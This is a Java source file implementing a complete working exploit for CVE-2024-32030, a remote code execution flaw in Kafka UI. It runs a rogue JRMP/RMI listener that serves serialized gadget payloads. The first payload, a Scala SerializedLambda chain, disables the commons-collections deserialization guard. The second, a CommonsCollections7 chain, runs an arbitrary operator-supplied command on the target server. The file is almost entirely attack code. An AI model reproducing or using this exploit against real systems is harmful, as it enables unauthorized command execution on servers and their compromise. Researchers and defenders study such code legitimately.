import java.io.*;
import java.lang.invoke.MethodHandleInfo;
import java.lang.invoke.SerializedLambda;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
import java.util.concurrent.ConcurrentSkipListMap;
import java.util.concurrent.atomic.AtomicInteger;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import sun.reflect.ReflectionFactory;

/**
 * Self-contained two-stage JRMP listener for CVE-2024-32030 (Kafka UI RCE).
 *
 * Stage 1 (Scala SerializedLambda gadget): sets the system property
 *   org.apache.commons.collections.enableUnsafeSerialization=true
 * inside the Kafka UI JVM, defeating the commons-collections 3.2.2 guard.
 *
 * Stage 2 (CommonsCollections7 gadget): fires Runtime.exec(<command>) inside
 * the Kafka UI JVM.
 *
 * The listener serves Stage 1 to the first RMI call it receives, then Stage 2
 * to every subsequent call (the property persists in the target JVM once set).
 *
 * Args: <port> <command>
 */
public class JrmpExploit {

    // ---- RMI/JRMP wire constants (from sun.rmi.transport.TransportConstants) ----
    static final int    MAGIC            = 0x4a524d49; // "JRMI"
    static final short  VERSION          = 2;
    static final byte   STREAM_PROTOCOL  = 0x4b;
    static final byte   SINGLEOP_PROTOCOL= 0x4c;
    static final byte   MULTIPLEX_PROTOCOL = 0x4d;
    static final byte   PROTOCOL_ACK     = 0x4e;
    static final byte   CALL             = 0x50;
    static final byte   PING             = 0x52;
    static final byte   PINGACK          = 0x53;
    static final byte   DGCACK           = 0x54;
    static final byte   RETURN           = 0x51;
    static final byte   EXCEPTIONAL_RETURN = 0x02;

    static final AtomicInteger callCount = new AtomicInteger(0);

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.err.println("Usage: JrmpExploit <port> <command>");
            System.exit(2);
        }

        int port = Integer.parseInt(args[0]);
        String command = args[1];

        final Object stage1 = buildScalaSetPropertyGadget(
                "org.apache.commons.collections.enableUnsafeSerialization", "true");
        final Object stage2 = buildCommonsCollections7(command);

        ServerSocket ss = new ServerSocket(port);
        System.err.println("[*] JRMP listener up on 0.0.0.0:" + port);
        System.err.println("[*] Stage 2 command: " + command);

        while (true) {
            final Socket s = ss.accept();
            new Thread(() -> {
                try {
                    handle(s, stage1, stage2);
                } catch (Throwable t) {
                    System.err.println("[!] connection error: " + t);
                } finally {
                    try { s.close(); } catch (IOException ignore) {}
                }
            }).start();
        }
    }

    static void handle(Socket s, Object stage1, Object stage2) throws Exception {
        s.setSoTimeout(15000);
        InetSocketAddress remote = (InetSocketAddress) s.getRemoteSocketAddress();
        System.err.println("[+] Connection from " + remote);

        DataInputStream in = new DataInputStream(new BufferedInputStream(s.getInputStream()));
        int magic = in.readInt();
        short version = in.readShort();
        if (magic != MAGIC || version != VERSION) {
            System.err.println("[!] bad JRMP header magic=" + Integer.toHexString(magic));
            return;
        }
        DataOutputStream out = new DataOutputStream(new BufferedOutputStream(s.getOutputStream()));
        byte protocol = in.readByte();

        if (protocol == STREAM_PROTOCOL) {
            out.writeByte(PROTOCOL_ACK);
            String host = remote.getHostName() != null ? remote.getHostName()
                                                        : remote.getAddress().toString();
            out.writeUTF(host);
            out.writeInt(remote.getPort());
            out.flush();
            in.readUTF();
            in.readInt();
        } else if (protocol == SINGLEOP_PROTOCOL) {
            // fallthrough to message
        } else {
            System.err.println("[!] unsupported protocol " + protocol);
            return;
        }

        doMessage(s, in, out, stage1, stage2);
        out.flush();
    }

    static void doMessage(Socket s, DataInputStream in, DataOutputStream out,
                          Object stage1, Object stage2) throws Exception {
        int op = in.read();
        switch (op) {
            case CALL:
                doCall(in, out, stage1, stage2);
                break;
            case PING:
                out.writeByte(PINGACK);
                break;
            case DGCACK:
                UID.read(in);
                break;
            default:
                System.err.println("[!] unknown transport op " + op);
        }
    }

    static void doCall(DataInputStream in, DataOutputStream out,
                       Object stage1, Object stage2) throws Exception {
        // Read the incoming call object header just enough to be polite.
        ObjectInputStream ois = new ObjectInputStream(in) {
            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                String n = desc.getName();
                if ("[Ljava.rmi.server.ObjID;".equals(n)) return ObjID[].class;
                if ("java.rmi.server.ObjID".equals(n)) return ObjID.class;
                if ("java.rmi.server.UID".equals(n)) return UID.class;
                throw new IOException("Not allowed to read object");
            }
        };
        ObjID read = ObjID.read(ois);
        if (read.hashCode() == 2) { // DGC
            ois.readInt();
            ois.readLong();
            ois.readObject();
        }

        int n = callCount.incrementAndGet();
        Object payload;
        if (n == 1) {
            System.err.println("[*] call #" + n + " -> delivering STAGE 1 (set property)");
            payload = stage1;
        } else {
            System.err.println("[*] call #" + n + " -> delivering STAGE 2 (CC7 exec)");
            payload = stage2;
        }

        out.writeByte(RETURN);
        // RMI requires a MarshalOutputStream: after every class descriptor it
        // writes a codebase annotation (null here) that the client's
        // MarshalInputStream expects. A plain ObjectOutputStream omits these and
        // the client reports "non-JRMP server"/StreamCorrupted.
        ObjectOutputStream oos = new MarshalOutputStream(out);
        oos.writeByte(EXCEPTIONAL_RETURN);
        new UID().write(oos);

        // Write the gadget object directly as the (exceptional) RMI return.
        // The target reads it with ObjectInputStream.readObject(); the gadget's
        // own readObject (ConcurrentSkipListMap / Hashtable) fires DURING that
        // deserialization, before any cast to Throwable, so wrapping it in a
        // Throwable holder is unnecessary and avoids JDK-17 field-type issues.
        oos.writeObject(payload);
        oos.flush();
        out.flush();
        System.err.println("[+] payload sent for obj " + read);
    }

    // ----------------------------------------------------------------------
    // Stage 1: Scala SerializedLambda gadget -> System.setProperty(key,value)
    // (Source: Huawei PSIRT CVE-2024-32030 analysis, scala-library 2.13.x)
    // ----------------------------------------------------------------------
    static Object buildScalaSetPropertyGadget(String key, String value) throws Exception {
        ReflectionFactory rf = ReflectionFactory.getReflectionFactory();

        Class<?> tuple2Cls = Class.forName("scala.Tuple2");
        Constructor<?> tupleCtor = tuple2Cls.getConstructor(Object.class, Object.class);
        Object prop = tupleCtor.newInstance(key, value);

        Class<?> function0Cls = Class.forName("scala.Function0");

        SerializedLambda lambda = new SerializedLambda(
                Class.forName("scala.sys.SystemProperties"),
                "scala/Function0", "apply", "()Ljava/lang/Object;",
                MethodHandleInfo.REF_invokeStatic, "scala.sys.SystemProperties",
                "$anonfun$addOne$1", "(Lscala/Tuple2;)Ljava/lang/String;",
                "()Lscala/sys/SystemProperties;", new Object[]{prop});

        Object resolvedLambda = roundTrip(lambda);

        Class<?> fillCls = Class.forName("scala.collection.View$Fill");
        Constructor<?> fillCtor = fillCls.getConstructor(int.class, function0Cls);
        Object view = fillCtor.newInstance(1, resolvedLambda);

        Class<?> iterOrdCls = Class.forName("scala.math.Ordering$IterableOrdering");
        Constructor<?> serCtor = rf.newConstructorForSerialization(
                iterOrdCls, Object.class.getDeclaredConstructor());
        Object iterableOrdering = serCtor.newInstance();

        // Dummy comparator first so we can insert without triggering the gadget
        ConcurrentSkipListMap map = new ConcurrentSkipListMap((o1, o2) -> 1);
        map.put(view, 1);
        map.put(view, 2);

        Field f = ConcurrentSkipListMap.class.getDeclaredField("comparator");
        f.setAccessible(true);
        f.set(map, iterableOrdering);
        return map;
    }

    /** ObjectOutputStream that writes the RMI codebase annotation (null) per class. */
    static final class MarshalOutputStream extends ObjectOutputStream {
        MarshalOutputStream(OutputStream out) throws IOException { super(out); }
        @Override protected void annotateClass(Class<?> cl) throws IOException { writeObject(null); }
        @Override protected void annotateProxyClass(Class<?> cl) throws IOException { writeObject(null); }
    }

    static Object roundTrip(Object o) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.flush();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
        return ois.readObject();
    }

    // ----------------------------------------------------------------------
    // Stage 2: CommonsCollections7 -> Runtime.exec(command)
    // (Ported from ysoserial CommonsCollections7 payload)
    // ----------------------------------------------------------------------
    @SuppressWarnings({"rawtypes", "unchecked"})
    static Object buildCommonsCollections7(String command) throws Exception {
        String[] execArgs = new String[]{command};

        final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        execArgs),
                new ConstantTransformer(1)};

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("yy", 1);

        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("zZ", 1);

        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        setFieldValue(transformerChain, "iTransformers", transformers);

        lazyMap2.remove("yy");

        return hashtable;
    }

    static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    static Field getField(Class<?> clazz, String fieldName) {
        Field field = null;
        while (clazz != null && field == null) {
            try {
                field = clazz.getDeclaredField(fieldName);
            } catch (NoSuchFieldException e) {
                clazz = clazz.getSuperclass();
            }
        }
        if (field != null) field.setAccessible(true);
        return field;
    }
}
